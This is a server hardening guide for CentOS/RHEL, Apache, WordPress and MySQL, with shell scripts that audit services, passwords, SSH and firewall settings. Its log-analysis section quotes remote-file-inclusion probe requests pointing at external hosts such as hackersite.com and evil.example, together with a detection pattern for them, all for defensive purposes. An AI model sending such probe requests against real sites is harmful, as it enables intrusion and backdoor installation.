Less is better. Minimize the operating system to only the services and packages the host actually needs, and remove the rest. For example, on a web server you can usually disable Telnet, NetBIOS, NIS, FTP, NFS, autofs, Bluetooth, CUPS (a server rarely needs a printing service), Bind (unless the host really is a DNS server) and ypbind (unless it binds to a NIS server). Think twice before disabling NTP: even if the application is not time sensitive, accurate clocks matter for log correlation and for validating TLS certificates. To see which services are started at boot in runlevel 3 (multi-user, non-graphical), run:
$ chkconfig --list | grep '3:on'
Then stop a service you do not need, for example acpid:
$ service acpid stop
and prevent it from starting at boot:
$ chkconfig acpid off
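The pruning step above, as an added example that is not part of the original article: the script parses `chkconfig --list` output, compares the services enabled in runlevel 3 against an allow-list, and prints the stop/disable commands for everything else. The allow-list is an assumption for a plain web server, and the `chkconfig` output is a constructed sample so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the original article): prune boot-time services on a
# chkconfig-based system (CentOS/RHEL 5-6). The allow-list is an assumption for a
# plain web server; adjust it for each host.

WEB_SERVER_ALLOWLIST="sshd httpd iptables syslog rsyslog crond network sysstat"

# Constructed sample of `chkconfig --list` output, so the example runs without chkconfig.
SAMPLE_CHKCONFIG='acpid          0:off   1:off   2:on    3:on    4:on    5:on    6:off
bluetooth      0:off   1:off   2:on    3:on    4:on    5:on    6:off
crond          0:off   1:off   2:on    3:on    4:on    5:on    6:off
cups           0:off   1:off   2:on    3:on    4:on    5:on    6:off
httpd          0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
network        0:off   1:off   2:on    3:on    4:on    5:on    6:off
nfs            0:off   1:off   2:off   3:off   4:off   5:off   6:off
sshd           0:off   1:off   2:on    3:on    4:on    5:on    6:off
ypbind         0:off   1:off   2:on    3:on    4:on    5:on    6:off'

# unneeded_services CHKCONFIG_OUTPUT ALLOWLIST
# Prints, one per line, every service that is "3:on" and whose name is not in ALLOWLIST.
# Lines of the xinetd section have no "3:on" field and are skipped automatically.
unneeded_services() {
    printf '%s\n' "$1" | awk -v allow=" $2 " '
        { for (i = 2; i <= NF; i++)
              if ($i == "3:on" && index(allow, " " $1 " ") == 0) print $1 }'
}

# disable_commands CHKCONFIG_OUTPUT ALLOWLIST
# Prints the command pair that stops each unneeded service now and keeps it off at boot.
disable_commands() {
    unneeded_services "$1" "$2" | while read -r svc; do
        printf 'service %s stop; chkconfig %s off\n' "$svc" "$svc"
    done
}

# On the real host, as root, review the output first and then pipe it to a shell:
#   disable_commands "$(chkconfig --list)" "$WEB_SERVER_ALLOWLIST" | sh
```

Review the printed commands before running them; a service you forgot to put on the allow-list (the logging daemon, for instance) would otherwise be switched off with the rest.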
Create only the user accounts you need, and set passwords that meet your password guidelines. If you are sure no further accounts will be created, follow: How to stop creating new users?
Attackers routinely try predictable user names in brute-force attacks: generic names such as 'admin', 'henry', 'sam' and 'bob', and service names such as 'apache', 'mysql' and 'postgres'. The service accounts are created by the packages themselves and normally have no password and a nologin shell; keep them that way and never give them interactive logins. Do not create human login accounts with such predictable names, and most importantly, never create a user account named after your website or service.
Enforce a password expiry policy so that every account has to change its password periodically. From the user's point of view this is not a popular policy, but you are left with little choice: according to one study, 20% of internet accounts had the password '123456'. Be careful when choosing your passwords, and set password expiry for users!
Distributions such as RHEL, Fedora and CentOS ask you to set the root password during installation, and the default sshd configuration (PermitRootLogin yes) lets root, like every other user, log in remotely. Disable direct root logins over SSH and use a normal account with sudo instead. Learn how to disable the root account!
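An added example covering the two points above (password expiry and root logins over SSH); it is not code from the original article. It works on text so it can run against constructed samples without root; on a real host feed it /etc/shadow and /etc/ssh/sshd_config. The account names, hashes and config lines are made up.

```shell
#!/bin/sh
# Added example (not from the original article): audit password ageing in /etc/shadow
# and the root-login and password-authentication settings in sshd_config.

# Constructed /etc/shadow sample; the hashes are truncated placeholders, not real credentials.
SAMPLE_SHADOW='root:$6$rounds$abc:15900:0:99999:7:::
bin:*:15900:0:99999:7:::
henry:$6$rounds$def:15900:0:90:7:::
deploy:$6$rounds$ghi:15900:0:99999:7:::
oldstaff:!!:15900:0:99999:7:::'

# Constructed /etc/ssh/sshd_config sample.
SAMPLE_SSHD_CONFIG='#PermitRootLogin yes
Port 22
PermitRootLogin yes
PasswordAuthentication yes'

# never_expiring SHADOW_TEXT
# Prints accounts that have a usable password hash (field 2 not "*", "!" or "!!") and no
# real maximum password age (field 5 empty, or 99999, the login.defs default).
never_expiring() {
    printf '%s\n' "$1" | awk -F: '
        $2 != "" && $2 !~ /^[!*]/ && ($5 == "" || $5 + 0 >= 99999) { print $1 }'
}

# sshd_setting CONFIG_TEXT KEYWORD
# Prints the effective value of KEYWORD. sshd takes the first uncommented occurrence and
# keywords are case-insensitive, so the commented "#PermitRootLogin yes" line is ignored.
sshd_setting() {
    printf '%s\n' "$1" | awk -v key="$2" 'tolower($1) == tolower(key) { print $2; exit }'
}

# audit_ssh CONFIG_TEXT -> one finding per line, nothing when the config is fine
audit_ssh() {
    [ "$(sshd_setting "$1" PermitRootLogin)" = "no" ] || echo "PermitRootLogin is not 'no'"
    [ "$(sshd_setting "$1" PasswordAuthentication)" = "no" ] || echo "PasswordAuthentication is not 'no' (prefer keys)"
}

# Remediation on the real host (as root), shown as commands rather than executed here:
#   chage -M 90 -W 7 deploy     # force a change every 90 days, warn 7 days ahead
#   sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config && service sshd reload
```

Run the audit against the live files with `never_expiring "$(cat /etc/shadow)"` and `audit_ssh "$(cat /etc/ssh/sshd_config)"`. Keep an SSH session open while changing sshd_config so a typo cannot lock you out.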
Most installations include the firewall package. If you need to install it manually, the following commands install the IPv4 and IPv6 firewall tools; this article only covers the IPv4 settings.
# yum install iptables
# yum install iptables-ipv6
Make sure the service is started and will start automatically on reboot.
# service iptables start
# chkconfig --level 345 iptables on
You can check the current status of the service with the following command.
# service iptables status
To disable the firewall (for example while debugging a connectivity problem; do not leave it off), run the following commands.
# service iptables stop
# chkconfig iptables off
Logwatch is the classic log-summary utility that emails a daily digest of activity from the Linux logs. On CentOS the default Logwatch install has few of its features enabled. Learn how to install Logwatch and configure it to receive daily email reports.
A ping request is an ICMP echo request. ICMP (Internet Control Message Protocol) is part of the Internet Protocol suite and is used by network elements such as routers to report errors, for instance that a host or service is unreachable. Dropping incoming ICMP echo requests therefore stops the host from answering ping. Do not drop all ICMP, though: destination-unreachable and time-exceeded messages are needed for path MTU discovery and traceroute, so block only the echo-request type. Learn how to disable or drop Ping (ICMP) packets to your server?
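The firewall setup and the ICMP handling above, as an added example that is not part of the original article: a minimal IPv4 iptables policy for a web server on CentOS/RHEL 5-6. `build_rules` only prints the rules, so they can be reviewed and tested without root; `apply_rules` loads and saves them. The trusted SSH source networks are an assumption; replace them with your own.

```shell
#!/bin/sh
# Added example (not from the original article): baseline iptables policy for a web
# server. Default deny on INPUT, HTTP/HTTPS open, SSH only from trusted networks,
# ICMP limited to the types that matter.

TRUSTED_SSH_SOURCES="14.129.0.0/16 202.83.0.0/16"   # assumption: your admin networks

# build_rules "NET1 NET2 ..." -> one iptables command per line, policy set last so an
# existing SSH session is not cut off between the flush and the ESTABLISHED rule.
build_rules() {
    cat <<'EOF'
iptables -F
iptables -X
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state INVALID -j DROP
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
EOF
    # SSH only from the trusted networks; everything else falls through to the DROP policy.
    for net in $1; do
        printf 'iptables -A INPUT -p tcp -s %s --dport 22 -j ACCEPT\n' "$net"
    done
    # ICMP: keep the error types TCP depends on (path MTU discovery, traceroute) and
    # answer ping at a bounded rate. Delete the limit rule to refuse ping entirely.
    cat <<'EOF'
iptables -A INPUT -p icmp --icmp-type destination-unreachable -j ACCEPT
iptables -A INPUT -p icmp --icmp-type time-exceeded -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 5/second --limit-burst 10 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
iptables -A INPUT -m limit --limit 2/minute -j LOG --log-prefix "iptables-drop: "
iptables -P INPUT DROP
EOF
}

# apply_rules "NET1 NET2 ..." -> load the rules (as root) and persist them to /etc/sysconfig/iptables
apply_rules() {
    build_rules "$1" | sh -e && service iptables save
}

# rule_count "NET1 ..." -> number of commands produced, a quick sanity check before applying
rule_count() {
    build_rules "$1" | wc -l | tr -d ' '
}

# Review first, then apply:  build_rules "$TRUSTED_SSH_SOURCES"; apply_rules "$TRUSTED_SSH_SOURCES"
```

After applying, confirm with `iptables -L -n -v` and test from outside the trusted networks that port 22 is closed and ports 80 and 443 still answer.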
Whatever the reason, keeping the kernel up to date should be high on your maintenance checklist: local privilege-escalation bugs are fixed in kernel updates, and a new kernel only takes effect after a reboot. So read An Ultimate Guide to Upgrade Kernel on CentOS/RHEL/Fedora
You can update all installed packages with the command below (remember that a kernel update still needs a reboot to take effect).
yum update
You might also like to know about configuring YUM and its usage examples.
Allow SSH access to your server only from trusted networks or hosts. sshd on CentOS is linked against TCP wrappers, so you can list the trusted networks in /etc/hosts.allow and deny everyone else in /etc/hosts.deny. TCP wrappers matches a network by a prefix ending in a dot or by an address/netmask pair; it does not understand '*' wildcards. For example:
# /etc/hosts.allow
sshd: 14.129. 202.83. 203.200.
# /etc/hosts.deny
sshd: ALL
Using ALL instead of sshd applies the rule to every wrapper-aware service. Note that this only protects services linked against libwrap (or started through xinetd); restricting port 22 in iptables as well gives you a second, independent control.
You can also allow only specific user accounts to log in from a remote host. To do that, follow this tutorial: How to allow or deny remote login to specific user accounts on Linux server
The main benefit of a chroot jail is that it limits the part of the file system the daemon can see to the root directory of the jail. Additionally, since the jail only needs to support Apache, the set of programs inside it can be kept extremely small. Most importantly, there is no need for setuid-root programs inside the jail, which are what an attacker would use to gain root and break out of it. Keep in mind that chroot is not a boundary against root: a process running as root inside the jail can escape, so the daemon must drop privileges. Learn - Apache in a chroot jail
One of the most important security settings in Apache is disabling directory listing. To do that, set the Options directive to None or -Indexes.
<Directory />
    Options None
    Order allow,deny
    Allow from all
</Directory>
(or)
<Directory />
    Options -Indexes
    Order allow,deny
    Allow from all
</Directory>
Order and Allow are Apache 2.2 directives; on Apache 2.4 use Require all granted instead. Options None on the root directory also switches off FollowSymLinks, which .htaccess-based rewriting needs, so many setups use -Indexes here and a tighter Options list in the document root.
To make your WordPress more secure, you can add an extra layer of protection to the wp-admin folder so that even authorized users cannot get in with their WordPress password alone. Know How?
Have you installed phpMyAdmin? If so, have you secured it properly? If not, read: Know how?
To check whether your website is being probed by scanners that use the libwww-perl user agent, run the command below against the Apache access log.
$ grep 'libwww-perl' access_log
Do you see something like the line below in the output?
190.85.10.147 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=//www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
It means someone is probing for a remote file inclusion hole (note the no_url parameter pointing at an external URL) in order to install a backdoor page. Blocking the libwww-perl user agent cuts off this kind of unsophisticated scanner, but the user-agent string is trivially changed, so fixing the vulnerable script is the real remedy. How to block it?
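The check above, as an added example that is not part of the original article: the first function summarises libwww-perl hits per client address in an access log in Apache combined format; the second goes further than the text and flags remote-file-inclusion probes by the shape of the request (a parameter pointing at an external URL), which a scanner cannot hide by changing its user agent. The log lines are constructed; addresses and host names are not real.

```shell
#!/bin/sh
# Added example (not from the original article): find libwww-perl scanners and
# remote-file-inclusion probes in an Apache access log (combined log format).

# Constructed access_log sample; addresses and host names are made up.
SAMPLE_ACCESS_LOG='190.85.10.147 - - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=//www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
198.51.100.7 - - [21/Aug/2013:21:23:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
190.85.10.147 - - [21/Aug/2013:21:23:05 +0000] "GET /themes/x/thumb.php?src=http://evil.example/a.txt HTTP/1.1" 404 310 "-" "libwww-perl/5.76"
203.0.113.9 - - [21/Aug/2013:21:24:11 +0000] "GET /?page=//evil.example/c.txt? HTTP/1.1" 200 640 "-" "libwww-perl/6.05"
198.51.100.42 - - [21/Aug/2013:21:25:40 +0000] "GET /index.php?file=https://evil.example/sh.txt HTTP/1.1" 200 640 "-" "Mozilla/5.0 (Windows NT 6.1)"'

# libwww_hits LOG_TEXT -> "count ip" per client that sent a libwww-perl user agent, busiest
# first. Splitting on the double quote puts the request in field 2 and the user agent in field 6.
libwww_hits() {
    printf '%s\n' "$1" | awk -F'"' '
        tolower($6) ~ /libwww-perl/ { split($1, a, " "); n[a[1]]++ }
        END { for (ip in n) print n[ip], ip }' | sort -rn
}

# rfi_probes LOG_TEXT -> "ip request" for every request whose query string points a
# parameter at an external URL (param=http://..., param=https://... or param=//host),
# the pattern in the article's log line, regardless of the user agent used.
rfi_probes() {
    printf '%s\n' "$1" | awk -F'"' '
        $2 ~ /[?][^ ]*=(https?:)?\/\/[^ ]/ { split($1, a, " "); print a[1], $2 }'
}

# Against the live log:  libwww_hits "$(cat /var/log/httpd/access_log)"
```

The last sample line is the point of the second function: the same probe arrives with a browser user agent, so a user-agent block alone would miss it. To block the agent in Apache 2.2 anyway, put `SetEnvIfNoCase User-Agent "libwww-perl" bad_bot` followed by `Deny from env=bad_bot` inside the site's Directory block.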
Recently a security firm reported that more than ninety thousand WordPress sites had been attacked by brute-force password guessing. If you want to secure your blog, check out How to change the default 'admin' username of your WordPress Blog?
Here is a list of the most popular WordPress security plugins as an infographic.
What should you do if one of your authors leaves the job with tons of posts written? Or if someone is trying to log in to WordPress by brute force? Know How?
Do a quick check of your WordPress page source: right-click an article page and choose View Source. You will notice that several JavaScript and stylesheet URLs carry a query string. The ver argument is usually the version of WordPress, or of the plugin that registered the asset, which tells an attacker exactly which known bugs to try. Here is an example of such a script and stylesheet.
//websitename.com/somejavascript.js?ver=3.4.2
//websitename.com/somestyle.css?ver=3.4.2
Know How to remove version information?
WordPress Security Keys make your website tougher to hack. They were introduced in WordPress 2.6 and are long random strings that WordPress mixes into the hashes it stores in the user's authentication cookies, so a cookie cannot be forged or reused without knowing the keys. If you leave them at the placeholder values, or choose simple ones like "wordpress" or "test123", they can be guessed. Know what WordPress Security Keys are and why you should add them in wp-config.php?
If you were wondering how to remove unnecessary meta tags from the HTML source of your WordPress site, here is how. The generator meta tag in particular reveals the CMS version you are running, and attackers love that kind of information. Know How?
Whitelist the hosts that need to connect to the database and GRANT only the privileges the application actually uses; a web application rarely needs more than SELECT, INSERT, UPDATE and DELETE, and never needs ALL PRIVILEGES or a wildcard host ('%'). In MySQL, execute a statement like the one below as an administrative user. The host part of the account name is what restricts where the user may connect from. (On MySQL 8 create the account first with CREATE USER, since GRANT ... IDENTIFIED BY was removed there.)
GRANT SELECT, INSERT, UPDATE, DELETE ON database.* TO 'username'@'trusted_domainname' IDENTIFIED BY 'securepassword';